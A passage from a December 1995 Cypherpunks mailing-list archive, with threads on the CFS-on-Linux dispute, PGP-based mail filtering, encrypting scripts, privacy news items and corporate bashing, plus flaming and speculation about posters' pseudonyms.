for evidence. If no evidence is found, they give it back --eventually. I saw one case go by a couple years back where they were trying to make the computer an accessory to the crime (I dunno, maybe it was supposed to auto-dial and drop the dime --no that's in 18USC as failure to snitch!) of course, if there are drugs involved, they confiscate it as spoils of the criminal act and the equipment is impounded and eventually sold after conviction for the benefit of their slush funds. I would imagin you have seen plenty of the latter one in the Federal attorney's office. this also gets into the issues of private cryptography and that _everybody_ should give up privacy protection, first amendment rights, etc. so uncle can catch a few dopers, gun runners, and other assorted malcreants [sic] --like the difference between {mis,mal}feasance: in both cases you get fucked, but 'mal' is intentional... > Not a lawyer on the Net, although I play one in real life. > hey, at least you admit you're having a good time! > ********************************************************** > Flame away! I get treated worse in person every day!! > -- -------------------------------------------------------------------- #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 Message-ID: On Sun, 24 Dec 1995, attila wrote: > On Sun, 24 Dec 1995, Brian Davis wrote: > > > On Sat, 23 Dec 1995, Perry E. Metzger wrote: > > > > Fred Cohen writes to me in private: > > ... > > > > > > Let's see. I guess I would start by having the police confiscate the > > > toad.com computers becfause thay are part of a criminal conspiracy to > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > I didn't realize that AI research was that far along. Can someone point > > me to the specs for the computer that can become a "part of a criminal > > conspiracy"?? > > > > EBD > > > > > > > daamage my reputation. Criminal because of the recent changes in the > > > law that prohibit you from sending me information I don't want to get. > > > > > > the basis of the seizure is for evidence collection. then they > take their sweet time scrounging the disks for evidence. If no > evidence is found, they give it back --eventually. I saw one case go > by a couple years back where they were trying to make the computer an > accessory to the crime (I dunno, maybe it was supposed to auto-dial > and drop the dime --no that's in 18USC as failure to snitch!) Much truth here, but not relevant to Dr. Fred's threat of a civil suit. He can't have his attorneys just call the FBI to pick up toad's computer. CoS's seizure of computers, while shameful, was based on a different legal theory than the good Dr. can possibly allege. EBD > of course, if there are drugs involved, they confiscate it as > spoils of the criminal act and the equipment is impounded and > eventually sold after conviction for the benefit of their slush funds. > > I would imagin you have seen plenty of the latter one in the > Federal attorney's office. this also gets into the issues of private > cryptography and that _everybody_ should give up privacy protection, > first amendment rights, etc. so uncle can catch a few dopers, gun > runners, and other assorted malcreants [sic] --like the difference > between {mis,mal}feasance: in both cases you get fucked, but 'mal' is > intentional... > > > > Not a lawyer on the Net, although I play one in real life. > > > hey, at least you admit you're having a good time! > > > ********************************************************** > > Flame away! I get treated worse in person every day!! > > > > > -- > -------------------------------------------------------------------- > #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL > $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa > 2/d0 pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2) > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQCNAy5vBesAAAEEAN8cl6vHXrKZ9lFfZDgfyJRr3HidW77Uio7F25QF6QXca5z/ > AS3ZrWsa0CjF2nwrqmyb1E5no7dFB+70ZfK8233r7ykVkWRojT+0K71lnUZO4cjG > +d19/ehXkDpkH3iHU7Uyo4ZdXLiI6uoFDS7ilzx8PCKcgvfq7b04kQrCC2kFAAUX > tAZhdHRpbGGJAJUDBRAur/X7xUpiaI661j0BAbVUA/9RSKN5sOFVB4rjV6+a2aWD > LjD5g/+eZaB/hI98qlPP+SBwzO3+K7+JWt3Fez0gKVju228ACGkvilg2VkMtQ0zm > YCexYL0U9StzHt4xEpowpmaWx22jpEvWnI10LZvT/NO3uYg5r/ezVYc7autKvfvI > rVOo322RkA0HNVV1rqjMGw== > =UNt4 > -----END PGP PUBLIC KEY BLOCK----- > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From jirib at sweeney.cs.monash.edu.au Sun Dec 24 03:03:42 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Sun, 24 Dec 1995 19:03:42 +0800 Subject: ex encrypted script In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net> Message-ID: <199512241046.VAA06529@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello andr0id at midwest.net (Jason Rentz) and Cypherpunks Dr0id wrote: > I have several simple scripts that are simple yet handle important realtime > call proccessing tasks and remote control operations. These programs are my > programs but are running on a system that is dialed into by the vendor once > in a while. The problem will be that a superuser can do just about anything... > Is there a way to encrypt a script yet still allow it to be runnable? I ... Well, what's wrong with pgp -f | /bin/sh ? Obviously, it still decrypts before use, and may or may not be useful depending on your application, but it never has a file with the unencrypted script around. > I thought of a few simple protections but they all involve decrypting before > running. It depends on what you want to prevent: copying the scripts, running them, understanding them, or what? To prevent copying/running them, you can use the above script, but you'll have to type in the passphrase each time (checking that noone is watching you, which is impossible with a determined su). If you just want them to not understand, obfuscation should suffice. (But reverse-engineering can still be applied.) (On the "supply useless source" subthread, it is possible to define the term "source code" so as to disallow such obfuscation. See the GNU GPL ("copyleft") licence for an example.) Adiau Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMN0vfyxV6mvvBgf5AQGHkwP9EXLywkYYY6yNEAD3psLr/mbd7ACDe9hF NxDdu1LRQqtTmRx2GaozIEg2QWBaADEZ3TP7WyQyN9g81mC5bPk6Ys7imCvSDYW5 U1qg6MuE/biLlKuScE0AlpPeeKmqwSdG8bo8IsnMyyBnaeN1mBvfXVbwXzkpgJ7O 3IwGHbmB/wg= =+g0v -----END PGP SIGNATURE----- From blancw at accessone.com Sun Dec 24 05:42:51 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Sun, 24 Dec 1995 21:42:51 +0800 Subject: To Youall Message-ID: <9512241324.AA23587@pulm1.accessone.com> ^ _:(O):_ <<<<<+>>>>> }}:{{ '^'^'^'^'^' ~~d^~q~V~p~^b~~ ^ |[pg/M\pgvgp/M\gp]| ^ g/M\pgp/M.M\pgp/M.M\pgp/M\p /M/:\M\V/M/:\M\V/M/:\M\V/M/:\M\ ~==|\M/&:&\MVM/&:&\MVM/&:&\MVM/&:&\M/|==~ *{$$$MeRrYxmaS$TocpunKs at eVeryWheRE.CoM$$$}* ~==|\/M\:/M\V/M\:/M\V/M\:/M\V/M\:/M\/|==~ '{\O[o%[anDtimMIe&eLDee,to0]&o]O/}' ^/.\:^.^W^.^:^.^W^.^:^.^W^.^:/\.^ {p\qVp^q:p^qVp^q:p^qVp/q} o=o\==o===O===o==/o=o x..X\..X../X..x (dbdb\W/dbdb) )'\\%//'( '***' &:& : . From bplib at wat.hookup.net Sun Dec 24 05:50:30 1995 From: bplib at wat.hookup.net (Tim Philp) Date: Sun, 24 Dec 1995 21:50:30 +0800 Subject: Civility Message-ID: Ladies and Gentlemen; As I am sure that most of you have noticed, this is a high volume list. I have just spent the last 20 minutes deleting personal attacks and non-crypto related junk from my mail. Normally, this list is of fairly high quality and I enjoy reading the technical and political discussions that appear here. It must be something in the water but lately the nonsense has reached epic proportions. Now I realize that trying to get an independent bunch of people (as the cypherpunks must be) to conform to a minimum standard of behaviour is like herding cats ( I like that image! ) but in the interests of your fellow list members, please take the attacks to private E-mail. This might make the volume of crypto-related material managable to the rest of us. Let the flames begin! ( In private E-mail please!) By the way, seasons greetings to everyone! Tim Philp Brantford, Ontario, Canada =================================== For PGP Public Key, Send E-mail to: pgp-public-keys at swissnet.ai.mit.edu In Subject line type: GET PHILP =================================== From dlv at bwalk.dm.com Sun Dec 24 07:10:19 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 24 Dec 1995 23:10:19 +0800 Subject: CFS and Linux In-Reply-To: <199512240748.AAA13767@wero.cs.byu.edu> Message-ID: <1T7LgD3w165w@bwalk.dm.com> "Don M. Kitchen" writes: > Sorry for being one of those who responds to Detweiler's troll... I wonder which of the participants are Lance... > > So the master is at last fallen. Kudos to Mr. Jim Choate and Dr. > > Dimitri Vulis for having the courage of their convictions to help > > unmask AT&T's deceit in claiming to support Linux and free software > > when, in truth, it is doing just the opposite. There's been a bit of confusion here. Perry Metzger stated that Matt Blaze doesn't have Linux and shouldn't support it. Naturally, this got a few Linux fans (like myself) overly emotional. Matt Blaze later said that he does have Linux (contrary to what Perry said), that CFS installs fine, under his version, and that he's been unable to duplicate the problem reported here (but will include a fix in future distributions if someone supplies it). It's a perfectly reasonable position. In particular, this is a much more reasonable position than the anal-retentive one most MS Windows freeware authors take when you ask them about running their programs under WinOS2. I told Matt what I thought of this in private e-mail. _I_ don't have a problem with Matt Blaze. My conjecture is that during this long holiday weekend certain contributors are taking recreational drugs before posting to the mailing list. > Patting yourself on the back again eh? I didn't know people as stupid > as you knew how to use email. That's what's wrong with the net in general. 10+ years ago, when I started using it, it was hard to use e-mail and Usenet, so most of the people using it had to be fairly intelligent. Today, no intelligence is required to use e-mail, or even a cpunks anonymous remailer. I wish crypto software and mail filtering software followed the suit and became as easy to use and transparent at the rest of our comm software. I've been communicating with one sci.crypt personality, who configured his procmail to accept e-mail only from a list of people he knows. To be able to send him e-mail, I had to contact him by other means and ask him to add my name to the list of approved correspondents. :) He's not checking digital signatures, just the from lines. (By the way, he's not on cypherpunks because he considers the level of crypto expertise here to be too low.) Is this where we're heading? --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Sun Dec 24 08:34:26 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Dec 1995 00:34:26 +0800 Subject: TAX_zip Message-ID: <199512241540.KAA04264@pipe2.nyc.pipeline.com> 12-24-95. NYPaper: "Money Laundering, New and Improved. To really hide loot, wait for the arrival of 'cybercash.' " The days when you could trust a Swiss banker to hold on to your millions and keep his mouth shut are long gone. Embarrassing disclosure incidents are forcing any money launderer worth his pocket change to go high-tech, using the wonder of home-banking computer programs to zip money across borders. What American authorities fear the most, however, is the rise of "cybercash." "The nightmare of it is that there is no registration of every transaction, the way there is if you use a Visa or Mastercard," said Stanley E. Morris, who heads the financial crimes enforcement network. TAX_zip (7k) From jya at pipeline.com Sun Dec 24 08:38:29 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Dec 1995 00:38:29 +0800 Subject: KID_zoo Message-ID: <199512241541.KAA04332@pipe2.nyc.pipeline.com> 12-24-95. NYPaper: "Case Involving Free Speech And the Internet Is Settled." A dispute about free speech on the Internet has been settled out of Court here after a local school district admitted that a high school principal had wrongly reprimanded a student for lampooning his school on the World Wide Web. The school district apologized to Mr. Paul Kim for the punitive actions. "We now know our own boundaries," said Ann Oxrieder, the school district's spokeswoman. "The Internet is unexplored territory for schools and we now know that when a student uses his own equipment and on his own time, we should stay out of it." KID_zoo (6k) From jya at pipeline.com Sun Dec 24 08:51:34 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Dec 1995 00:51:34 +0800 Subject: RAT_357 Message-ID: <199512241548.KAA04638@pipe2.nyc.pipeline.com> The NYPaper of 12-23 and 12-24-95 report on the arrest Wednesday and "suicide" yesterday of Thomas Lewis Lavy, who was jailed under anti-terrorism statutes for trying to import from Canada to Alaska 130 grams of the deadly poison ricin -- enough to "kill thousands of people," officials said. Some 40 F.B.I. agents and Army chemical warfare specialists mounted the assault in deadly "survivalist, fundamentalist" Arkansas, right deadly Ollie North's recreational-poison/gun swap fly-in. Lavy's attorney, Sam Heuer, took sharp issue with the government's accusations. "It is such a tragic case," Mr. Heuer said. "An overzealous U.S. Attorney in Alaska and a hot dog F.B.I. agent tried to paint Tom as something he was not. Tom was a very gentle, very kindly person. We have the right to have rat poison or coyote poison, just like we have the right to have a .357 Magnum." RAT_357 (12k) From jcobb at ahcbsd1.ovnet.com Sun Dec 24 09:03:18 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Mon, 25 Dec 1995 01:03:18 +0800 Subject: FTC Privacy Initiative Message-ID: Friend, You may wish to inform yourself about the FTC Privacy Initia- tive: The US Federal Trade Commission has launched a "Privacy Initia- tive" to investigate whether the information collected at web- sites (either that affirmatively submitted by a visitor via a form or information collected based upon a visitor's selection of pages at a site to reflect personal interests) should be the subject of regulation by the FTC. To get background on this effort, you may want to read a speech by FTC Commissioner Varney on Electronic Commerce and Privacy which is available at the FTC's site under speeches http://www.ftc.gov or [at] the Advertising Law Internet Site http;//www.webcom.com/~lewrose/home.html under speeches. This week the staff of the FTC established a mailing list to allow interested parties to discuss the issues surrounding the privacy interests of consumers visiting web sites. To subscribe, send the message subscribe to privacy-request at ftc.gov ---- The above is an excerpt from a 12 20 95 message to another list. Cordially, Jim From dsr at lns598.lns.cornell.edu Sun Dec 24 09:05:14 1995 From: dsr at lns598.lns.cornell.edu (Daniel S. Riley) Date: Mon, 25 Dec 1995 01:05:14 +0800 Subject: [Noise] Re: Alta Vista caches queries In-Reply-To: <199512220220.DAA27203@utopia.hacktic.nl> Message-ID: <9512241608.AA07620@lns100.lns.cornell.edu> In article <199512220220.DAA27203 at utopia.hacktic.nl> nobody at REPLAY.COM (Anonymous) writes: nobody> I just stopped in on Digital's new Alta Vista page, and was nobody> surprised to find that the query field was filled in--with a nobody> search I ran 3 or 4 days ago. The forms interface for Alta Vista uses METHOD="GET", which means the parameters for the query are encoded in the URL, not transmitted separately as it would be for METHOD="POST". For example, a search for "cypherpunks" sends a request for the URL http://www.altavista.digital.com\ /cgi-bin/query?what=web&q=cypherpunks&Submit.x=0&Submit.y=0&pg=q If I bookmark that URL and return to it later, Alta Vista will rerun the query just as it did the first time (btw, the first two hits from that search are detweiler pages). On several visits to http://www.altavista.digital.com/ I see no evidence that they are caching queries, so I suspect you cached the query yourself by bookmarking a search result. Of course, this does not mean that one shouldn't have the usual privacy concerns that apply to any WWW service... From ericm at lne.com Sun Dec 24 09:05:34 1995 From: ericm at lne.com (Eric Murray) Date: Mon, 25 Dec 1995 01:05:34 +0800 Subject: CFS and Linux In-Reply-To: <1T7LgD3w165w@bwalk.dm.com> Message-ID: <199512241606.IAA04460@slack.lne.com> > That's what's wrong with the net in general. 10+ years ago, when I started > using it, it was hard to use e-mail and Usenet, so most of the people using it >had to be fairly intelligent. Today, no intelligence is required to use e-mail, > or even a cpunks anonymous remailer. I wish crypto software and mail filtering > software followed the suit and became as easy to use and transparent at the > rest of our comm software. Long for the good old days of bang-paths, 300 baud acoustic couplers and UUCP maps? see http://www.lne.com/lemay/writings/curmudgeonnet.html > I've been communicating with one sci.crypt personality, who configured his > procmail to accept e-mail only from a list of people he knows. To be able to >send him e-mail, I had to contact him by other means and ask him to add my name > to the list of approved correspondents. :) He's not checking digital > signatures, just the from lines. (By the way, he's not on cypherpunks because > he considers the level of crypto expertise here to be too low.) > > Is this where we're heading? Close. Where we're headed is mail filters with PGP imbedded (PGP 3 will make this much easier) that check incoming mail for a valid signature for certain PGP keyid/fingerprints and pass that mail along. Other mail that doesn't match gets tossed into a 'junk' folder or thrown away if you really don't want to talk to anyone that you don't already know. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From owner-cypherpunks at toad.com Sun Dec 24 13:44:32 1995 From: owner-cypherpunks at toad.com (owner-cypherpunks at toad.com) Date: Mon, 25 Dec 1995 05:44:32 +0800 Subject: No Subject Message-ID: Eric Murray wrote: | Where we're headed is mail filters with PGP imbedded (PGP 3 will | make this much easier) that check incoming mail for a valid signature | for certain PGP keyid/fingerprints and pass that mail along. | Other mail that doesn't match gets tossed into a 'junk' folder | or thrown away if you really don't want to talk to anyone that you | don't already know. I agree with the assesment of where we may be going, but the technology is available now. (Marshall Rose uses it; if you want to get mail into his private mailbox, offer him some $ via imbedded FV authorizations in the mail, and it goes into his inbox. If he thinks it was worth his time, he doesn't charge you.) Anyway, the code is defeintely available now. The back end is a little kludgy, but it was needed for an auto ley retreival script. This could easily be hacked to include a +pubring=$people line. The script gives you a keyid, which you can then use to filter on, ie: :0BW * -----BEGIN PGP KEYID=|sender_unknown # the sender unknown script is below :0: ? [ $KEYID = (`cat .buddies`) ] | /var/spool/mail/adam :0e: junk #!/bin/sh # unknown returns a keyid, exits 1 if the key is known # $output is to get the exit status. Othierwise, this would be a one liner. OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null` echo $OUTPUT | egrep -s 'not found in file' EV=$? if [ $EV -eq 0 ]; then echo $OUTPUT | awk '{print $6}' fi exit $EV -- "It is seldom that liberty of any kind is lost all at once." -Hume From cp at proust.suba.com Sun Dec 24 15:08:17 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Mon, 25 Dec 1995 07:08:17 +0800 Subject: CFS and Linux Message-ID: <199512242026.OAA02586@proust.suba.com> > AT&T's refusal to support CFS and other so-called "secure" software > under Linux is typical and to be expected. This is the dumbest thread I've ever seen. First of all, AT&T lets Matt distribute CFS and other crypto related tools from an AT&T site. In the current legal environment, I think that's a good show of "support". Second of all, Matt has put in a lot of effort to make CFS usable to Linux users. I have personally gotten help on more than one occaision from Matt with CFS and Linux, and I've seen him answer lots of questions on the CFS users' mail list. Here's an example: when I first started using CFS, the documents were formatted with a macro that wasn't included with the most popular linux distributions. I pointed this out to Matt and took the time to rewrite the docs using a different macro, so Linux users would be able to read it. I'll bet he's done dozens of fixes to make CFS run better on Linux boxes. What's more, Matt recently took the trouble to set up a Linux box for the sole purpose of testing CFS on it. I love Linux and I use it, but the fact that everyone has a slightly different distribution makes it a tough platform to support. As Matt's already pointed out, most of the problems that people have with Linux and CFS seem to stem from a broken rpgen that come with some, but not all, distributions of Linux. Finally, as Perry pointed out, neither Matt nor AT&T owe us anything, so it would be impossible to find fault with Matt even if he hadn't done any work to support Linux. Lots of people run CFS on Linux. I'd even be willing to bet that Linux is the most popular CFS platform, judging from the traffic on the list. If you can't run CFS on your Linux box, you might want to consider the possibility that you don't know what you're doing. From cp at proust.suba.com Sun Dec 24 15:09:04 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Mon, 25 Dec 1995 07:09:04 +0800 Subject: corporate bashing Message-ID: <199512242101.PAA02640@proust.suba.com> There have been some recent posts here flaming AT&T, Netscape, and people like Matt and Jeff who work for them. These posts seem to come out a paranoid mindset that distrusts any institution with power, and a romantic idea that the cypherpunks are subversive idealists fighting for truth and justice in the face of overwhelmingly powerful opponents. The truth is that several important institutions have contributed a lot to the fight for privacy. That may not be romantic, and it may not fit well with some people's adolescent fantasies, but it is what's actually happened. The New York Times, the most influential paper in America, has consistently argued against censorship on the net. MIT, one of our most prestigious universities, has taken on the free distribution of strong crypto tools and lent considerable credibility to Phil Zimmermann. AT&T funded the research Matt Blaze did which deomonstrated that a forge chip would interoperate with an escrowed one. If we had to pick one single thing that killed clipper, it would probably be that deomonstration. Netscape not only put crypto into its products, it's opening them up so that they'll talk to other people's products. This is a big step forward: even if Netscape caves into GAK, you'll be able to talk to one of Sameer's Apache-SSL servers in the Netherlands. GAK is unenforceable if standards are open and interoperability is possible. And despite the complaints of many here, Netscape has taken a strong stand aginst GAK and ITAR. Even Microsoft's Bill Gates has apparently written well and persuasively aginst GAK. None of this is conincidental, and if you don't understand why you ought to read Friedman's "Capitalism and Freedom". We are not extremists. There is nothing extreme about believing that an email you send to your spouse or your friend ought to be private, or that people ought to be able to read and write about whatever subject interests them. The extremists are those who are fighting so hard to preserve the possibility of totalitarianism. From anonymous-remailer at shell.portal.com Sun Dec 24 15:10:46 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 25 Dec 1995 07:10:46 +0800 Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE?? Message-ID: <199512242051.MAA24295@jobe.shell.portal.com> Well, it looks like somebody finally seconded my vote for AT&T & Netscape to win the Christmas Net Scrooge Award. His words were: "It makes me sick ... it's like the Nazi's sending out the Brownshirts to break the windows for all the looters." So, I'll just repost the entire nomination without any editting. Even though I've gotten Christmas wish #2 (Bob Dole is NOT going to Bosnia), I think it's still topical, since I'm still waiting on Christmas wish #1 and #3. So ... just in case Santa is listening ... and since I already got wish #2, rather than just bringing Peace on Earth and Goodwill to All Men, which everybody asks for, anyhow -- could Santa do something about the Big Bad Oil Companies who want to drill in the Arctic National Wildlife Refuge?? I _know_ that Santa wants to protect the sensitive tundra around his Northern home. We all know that we aren't short of oil on the North American continent, like the Big Bad Oil Companies would have us believe. The Canadian tar sands in Alberta have proven reserves larger than Saudi Arabia, and are already a proven technology, and Torch Energy out of Texas is already a player, there, I think. No need to disturb the Wildlife. Protecting some Cariboo, would be a right friendly Christmas present, from Santa, if he can pull some strings. Thanks Santa. (if you're listening, I mean ...) (And now, for the repost ...) - - - - - - - - - - - - - - - - - - - - - Just in case, anyone missed this yesterday, I thought I'd renominate AT&T & Netscape for the: *** 1995 CHRISTMAS NET SCROOGE *** *** AWARD *** (T-shirt sales coming soon, to a website near you ...) ------------ Alice here ... Back on Tue, 19 Dec 1995, I wrote: >>>Can anyone tell me whether Ian Goldberg and David Wagner got their >>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's >>>existing product line?? >>> >> >I can't remember whether they got anything or not ... >> >> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!). > > Not anything?? That's shameful ... where on earth are the values in > America, today? Everyone should ask this question. AT&T can sign-on to a two-page ad, calling on Congress to balance the budget -- to cut off veterans, and cut-off women with dependent children just before Christmas. It can sign on to this, but it can't bother to even offer a scholarship to the students who helped make its fortunes. It would rather leave the impression that it freeloads off of other's efforts. It's shameful. > AT&T and Netscape have jointly made a small fortune distributing this > product, and yet NEITHER company feels that the software engineers who > "voluntarily" made a difference -- a couple of students -- deserve > even a wooden nickel for the ideas which were used. > > It's absolutely shameful. But then, I guess that AT&T and Netscape > have no shame at all. > > They just steal "intellectual property" from students, and don't even > pay a token amount. > > And people wonder what's wrong with America? Luckily for those of us who don't live in the United States, we can perhaps look at that country and truly wonder what is going on over there, and what is wrong with America? Where are the values amongst ALL Americans, not just Netscape and AT&T? What are the role models that all the leaders -- business, sports, and political leaders -- show to the national youth. Here is all I've seen (as a foreigner), over the last while: Enid Greene Waldholtz blubbering in a news conference about how she as a congress person certainly COULDN'T be expected to resign after winning her election with stolen money. Blubbering for five hours straight (except when she had to stop to turn a page, I mean) ... She certainly said that "leadership" is all about playing "victim". Poor little Enid. (And even worse, she was _defended_ by Susan Molinari.) Bob Dole, deciding to go to Bosnia. The former WW II veteran willingly jeopardizing the lives of American boys -- boys who have put their lives on the line in a _volunteer_ armed force -- all for a lousy political photo-op. The chance to say ... "hey look at me, I'm here in Bosnia." Someone who's willing to overrule the Pentagon's own most diplomatic advice on how complex an operation this actually is. And then there is AT&T. A company who's Chairman can publish a letter which calls on Congress to cut off checks to mothers with dependent children and war veterans days before Christmas, all while stealing and freeloading off of the work of some students. Scrooge ... take heart. Here's Holiday wish #1. Enid do the right thing ... resign. Say the "right thing" and say that your child -- the future and the delayed gratification that the future brings -- is much more important than your own personal PRESENT political aspirations. Here's Holiday wish #2. Bob, lots of people worked their asses off to make sure that the American fighter pilot, and the two French fighter pilots could be rescued from Bosnia. If you want to go and get some photo-ops, go to Germany or Italy, and give one hell of a vote of support to the boys that are there -- a support which could just as easily have been given and should be given in Congress. A _real_ strong unfettered commitment. And here's Holiday wish #3. AT&T. Do the right thing. Reward those people who help make you a fortune. Stand tall as an example, rather than as an embarrassment to the nation. You've ignored this for so long now, that you've almost dug your own grave. But you still have a chance to save face. Have the courage to take the chance when it's offered. Simply say that the proposal to reward David Wagner and Ian Goldberg -- some holiday mad money and scholarships -- was lost in committee, and approval processes -- but it WAS in the works, and it was recommended and can now be announced just before Christmas, as a rightful reward. Some holiday cheer. Will people think it's a cynical attempt at manipulation? Yep. But it's a darned site better than the alternatives -- especially when you look at possible future outcomes. Trust me, this is far better than calling for veterans and single mothers with children to be cut-off just before the holidays. Perhaps, Enid, Bob, and AT&T will all learn when to use offense and when to use defense. They might also learn that the best offense is a good defense. They might even begin to look at what "courage" truly is, and of how difficult it can be for anyone to do the "right thing", especially when they think that they're surrounded by minefields. Even when the "right thing" is in your own best interest, you not only have to be shown the right path to take, but you have to have the motivation and courage to make the move and take action. Enid, Bob, and AT&T, take note. Hopefully for the holidays, everyone finds the courage to neutralize some portion of the vulnerability spectrum they've placed themselves in. > > - Ian "There's a reason people talk about `starving grad students'..." > > Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From nobody at valhalla.phoenix.net Sun Dec 24 15:15:42 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Mon, 25 Dec 1995 07:15:42 +0800 Subject: X-Mas-Pisswords Message-ID: <199512241945.NAA06757@ valhalla.phoenix.net> Pseudonymous confusion. S. Boxx and Sue D. Nym (and some others with short duration) are proven historical nyms of Larry (Lance) Detweiler. Vladimir S. Nuri is the going suspected (proven?) tentacle; some believe he is Larry's better self. Dimitri Vulis seems closely related letter-wise. Alice originally drew attention when claiming that he had found a 'huge hole' in Netscape (if configured to run Postscript code). Alice (now with a penet address) is claiming to be a Canadian and has knowledge supporting that claim (according to other Canadians on the list). He is still attacking Netscape (and ATT) now and then, in between political causeries. The obvious other Alice('s) posted for a short period mainly to make a point about signatures. Fred Cohen once(?) had a reputation as a virus expert, being on the panel of various security conferences. He has since obviously made many enemies on the firewall list, and now also on this list. He is not a Canadian(?). He shares Alice's concern for Postscript (and JAVA) on the WWW but does not come anyway near Alice in political (occasionally rather funny) muck-raking. Analysis of writing styles clearly outdistance Larry (Nuri, Vulis) from (the Canadian) Alice. Fred and Alice are not as easy to separate, especially when they are flaming, but probably they are not the same. Pissy From jkm3 at pipeline.com Sun Dec 24 15:17:10 1995 From: jkm3 at pipeline.com (John K. Mackenzie) Date: Mon, 25 Dec 1995 07:17:10 +0800 Subject: Mailing list Message-ID: <30DDD1E3.3A09@nyc.pipeline.com> Put me on your list if you get anything started. From jya at pipeline.com Sun Dec 24 15:17:17 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Dec 1995 07:17:17 +0800 Subject: Jingling Bells Message-ID: <199512241953.OAA15659@pipe4.nyc.pipeline.com> That NY Times upbeat shopping report on gift-horse laundering recalls Judeo-Christo-Muslim-Buddhist-whatever X-marketing of indulgences to complicitously blessed international drug-running bandit-patrons of days gone by. Battling the state for tax-whack is the grand legacy of brawling twix cult and state. Tithe or tax, forgiveness or the noose, adorable mass-murderer, theism or atheism, no exit, you're hoisted. It's a fine compact for building monuments to bedrugged faith of earthly pleasures, temples and capitols, cons spiritual blessing and caressing cons secular for percentages generous. Bedrugged with the rich history and rewarding journalism of such back-scratching by gods of mammons galore, one wonders how many Caribbean rimmers of yet unadvertized international cults are now bulging their laundry sacks cuts of the drugs. To the cults of rome and jerusalem and mecca for swamplords of rickety blow-downs, of scientologists mimcking these venerable predecessors, add the ex-swiss bankers now sweltering in hellish Cayman, the hot-eyed ex-usa's with kids in college, sole-practitioner very hungry beagles, all deeply inhaling the colombian aroma. All offering mother goose refuge from Sam, off-shore, in the cave of shadows, any world of illusory power where you're willing to pay the stiff-arm dues for protective delusion. There's no fee meal like that served by god-mammon's own earthly courtesans and courtiers sweet-and-sour abrading innermost money=immortality fears. CoS's E-meter-cleaner is dead-on for E-cash-drug jingling bells. From dlv at bwalk.dm.com Sun Dec 24 15:19:06 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Mon, 25 Dec 1995 07:19:06 +0800 Subject: CFS and Linux In-Reply-To: <199512241606.IAA04460@slack.lne.com> Message-ID: Eric Murray writes: > > > That's what's wrong with the net in general. 10+ years ago, when I started > > using it, it was hard to use e-mail and Usenet, so most of the people using > >had to be fairly intelligent. Today, no intelligence is required to use e-ma > > or even a cpunks anonymous remailer. I wish crypto software and mail filter > > software followed the suit and became as easy to use and transparent at the > > rest of our comm software. > > Long for the good old days of bang-paths, 300 baud acoustic couplers > and UUCP maps? see http://www.lne.com/lemay/writings/curmudgeonnet.html Not at all -- I welcome all progress. My first modem was 110 bps. When we got a 300 bps one, it seemed lightning fast (and really cut down the LD bill for the data calls to Virginia). In fact, I'm very happy that easy-to-use Internet software enables people to use the net who couldn't do it before. I've been telling all my non-computer acquaintences to get onto the net for 5--8 years, but most of them did only in the last year or two. I wish there was real easy privacy-enhancement software that every "clueless newbie" could use. Maybe in PGP 3... > Where we're headed is mail filters with PGP imbedded (PGP 3 will > make this much easier) that check incoming mail for a valid signature > for certain PGP keyid/fingerprints and pass that mail along. > Other mail that doesn't match gets tossed into a 'junk' folder > or thrown away if you really don't want to talk to anyone that you > don't already know. Alas, this is what the future net will be like. Some out-of-band communication will be necessary before e-mail can be exchanged; or perhaps there will be a protocol to enable Alice to write Bob (who doesn't know Alice) and say: "You don't know me, but Carol vouches that it's worth your while for you to read my e-mail." Or Alice can ask Carol to e-mail Bob directly. Is something like this already available for FTP? :) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From harmon at tenet.edu Sun Dec 24 15:19:22 1995 From: harmon at tenet.edu (Dan Harmon) Date: Mon, 25 Dec 1995 07:19:22 +0800 Subject: CFS and Linux (fwd) In-Reply-To: <199512231640.LAA07020@jekyll.piermont.com> Message-ID: On Sat, 23 Dec 1995, Perry E. Metzger wrote: < elided> > > Setting up and doing work on a new operating system is *WORK*. It > takes time. It takes space in your lab or 